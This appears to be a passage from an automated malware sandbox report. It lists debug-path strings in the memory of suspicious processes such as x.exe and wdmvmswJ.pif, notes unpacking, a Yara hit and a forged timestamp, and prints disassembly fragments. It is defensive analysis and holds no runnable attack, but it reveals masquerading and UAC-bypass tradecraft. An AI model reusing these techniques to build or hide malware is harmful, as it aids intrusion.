Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1530165716.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000001.1581602644.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000000.1581239901.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerfHost.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: GoogleUpdate_unsigned.pdb source: alg.exe, 00000010.00000003.2967850181.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerfHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TieringEngineService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TieringEngineService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdb source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: snmptrap.pdb source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msiexec.pdb source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _.pdb source: wdmvmswJ.pif, 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.0000000002932000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002931000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WmiApSrv.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: locator.pdb source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2227816265.000000001E790000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: snmptrap.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerceptionSimulationService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: wdmvmswJ.pif, 0000000C.00000003.2209705208.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WmiApSrv.pdb source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: locator.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\Public\Libraries\wdmvmswJ.pif Unpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:EW;
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Unpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:EW;
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Unpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Unpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack
Source: Yara match File source: 4.2.x.exe.2af0000.0.unpack, type: UNPACKEDPE
Source: wdmvmswJ.pif.4.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0894C LoadLibraryW,GetProcAddress,FreeLibrary, 4_2_02B0894C
Source: alpha.pif.8.dr Static PE information: section name: .didat
Source: Acrobat.exe.12.dr Static PE information: section name: .didat
Source: setup.exe.12.dr Static PE information: section name: .didat
Source: setup.exe.12.dr Static PE information: section name: _RDATA
Source: updater.exe.12.dr Static PE information: section name: .00cfg
Source: updater.exe.12.dr Static PE information: section name: .voltbl
Source: updater.exe.12.dr Static PE information: section name: _RDATA
Source: IntegratedOffice.exe.12.dr Static PE information: section name: .didat
Source: IntegratedOffice.exe.12.dr Static PE information: section name: _RDATA
Source: OfficeC2RClient.exe.12.dr Static PE information: section name: .didat
Source: OfficeC2RClient.exe.12.dr Static PE information: section name: .detourc
Source: officesvcmgr.exe.12.dr Static PE information: section name: .didat
Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: .00cfg
Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: .gxfg
Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: .retplne
Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: LZMADEC
Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: _RDATA
Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: malloc_h
Source: chrmstp.exe.12.dr Static PE information: section name: .00cfg
Source: chrmstp.exe.12.dr Static PE information: section name: .gxfg
Source: chrmstp.exe.12.dr Static PE information: section name: .retplne
Source: chrmstp.exe.12.dr Static PE information: section name: CPADinfo
Source: chrmstp.exe.12.dr Static PE information: section name: LZMADEC
Source: chrmstp.exe.12.dr Static PE information: section name: _RDATA
Source: chrmstp.exe.12.dr Static PE information: section name: malloc_h
Source: setup.exe0.12.dr Static PE information: section name: .00cfg
Source: setup.exe0.12.dr Static PE information: section name: .gxfg
Source: setup.exe0.12.dr Static PE information: section name: .retplne
Source: setup.exe0.12.dr Static PE information: section name: CPADinfo
Source: setup.exe0.12.dr Static PE information: section name: LZMADEC
Source: setup.exe0.12.dr Static PE information: section name: _RDATA
Source: setup.exe0.12.dr Static PE information: section name: malloc_h
Source: armsvc.exe.12.dr Static PE information: section name: .didat
Source: alg.exe.12.dr Static PE information: section name: .didat
Source: GoogleCrashHandler64.exe.12.dr Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.12.dr Static PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.12.dr Static PE information: section name: .gehcont
Source: FXSSVC.exe.12.dr Static PE information: section name: .didat
Source: elevation_service.exe.12.dr Static PE information: section name: .00cfg
Source: elevation_service.exe.12.dr Static PE information: section name: .gxfg
Source: elevation_service.exe.12.dr Static PE information: section name: .retplne
Source: elevation_service.exe.12.dr Static PE information: section name: _RDATA
Source: elevation_service.exe.12.dr Static PE information: section name: malloc_h
Source: elevation_service.exe0.12.dr Static PE information: section name: .00cfg
Source: elevation_service.exe0.12.dr Static PE information: section name: .gxfg
Source: elevation_service.exe0.12.dr Static PE information: section name: .retplne
Source: elevation_service.exe0.12.dr Static PE information: section name: _RDATA
Source: elevation_service.exe0.12.dr Static PE information: section name: malloc_h
Source: maintenanceservice.exe.12.dr Static PE information: section name: .00cfg
Source: maintenanceservice.exe.12.dr Static PE information: section name: .voltbl
Source: maintenanceservice.exe.12.dr Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.12.dr Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.12.dr Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.12.dr Static PE information: section name: .gehcont
Source: 117.0.5938.132_chrome_installer.exe.12.dr Static PE information: section name: .00cfg
Source: 117.0.5938.132_chrome_installer.exe.12.dr Static PE information: section name: .retplne
Source: msdtc.exe.12.dr Static PE information: section name: .didat
Source: msiexec.exe.12.dr Static PE information: section name: .didat
Source: MsSense.exe.12.dr Static PE information: section name: .didat
Source: Spectrum.exe.12.dr Static PE information: section name: .didat
Source: TieringEngineService.exe.12.dr Static PE information: section name: .didat
Source: unpack200.exe.12.dr Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.12.dr Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.12.dr Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.12.dr Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.12.dr Static PE information: section name: _RDATA
Source: cookie_exporter.exe.12.dr Static PE information: section name: .00cfg
Source: cookie_exporter.exe.12.dr Static PE information: section name: .gxfg
Source: cookie_exporter.exe.12.dr Static PE information: section name: .retplne
Source: cookie_exporter.exe.12.dr Static PE information: section name: _RDATA
Source: identity_helper.exe.12.dr Static PE information: section name: .00cfg
Source: identity_helper.exe.12.dr Static PE information: section name: .gxfg
Source: identity_helper.exe.12.dr Static PE information: section name: .retplne
Source: identity_helper.exe.12.dr Static PE information: section name: _RDATA
Source: identity_helper.exe.12.dr Static PE information: section name: malloc_h
Source: setup.exe1.12.dr Static PE information: section name: .00cfg
Source: setup.exe1.12.dr Static PE information: section name: .gxfg
Source: setup.exe1.12.dr Static PE information: section name: .retplne
Source: setup.exe1.12.dr Static PE information: section name: LZMADEC
Source: setup.exe1.12.dr Static PE information: section name: _RDATA
Source: setup.exe1.12.dr Static PE information: section name: malloc_h
Source: msedgewebview2.exe.12.dr Static PE information: section name: .00cfg
Source: msedgewebview2.exe.12.dr Static PE information: section name: .gxfg
Source: msedgewebview2.exe.12.dr Static PE information: section name: .retplne
Source: msedgewebview2.exe.12.dr Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.12.dr Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.12.dr Static PE information: section name: _RDATA
Source: msedgewebview2.exe.12.dr Static PE information: section name: malloc_h
Source: vds.exe.12.dr Static PE information: section name: .didat
Source: VSSVC.exe.12.dr Static PE information: section name: .didat
Source: WmiApSrv.exe.12.dr Static PE information: section name: .didat
Source: wmpnetwk.exe.12.dr Static PE information: section name: .didat
Source: SearchIndexer.exe.12.dr Static PE information: section name: .didat
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B1D2FC push 02B1D367h; ret 4_2_02B1D35F
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF63AE push 02AF640Bh; ret 4_2_02AF6403
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF63B0 push 02AF640Bh; ret 4_2_02AF6403
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF332C push eax; ret 4_2_02AF3368
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B1C378 push 02B1C56Eh; ret 4_2_02B1C566
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AFC349 push 8B02AFC1h; ret 4_2_02AFC34E
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B1D0AC push 02B1D125h; ret 4_2_02B1D11D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0306B push 02B030B9h; ret 4_2_02B030B1
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0306C push 02B030B9h; ret 4_2_02B030B1
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B1D1F8 push 02B1D288h; ret 4_2_02B1D280
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0F108 push ecx; mov dword ptr [esp], edx 4_2_02B0F10D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B1D144 push 02B1D1ECh; ret 4_2_02B1D1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF6784 push 02AF67C6h; ret 4_2_02AF67BE
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF6782 push 02AF67C6h; ret 4_2_02AF67BE
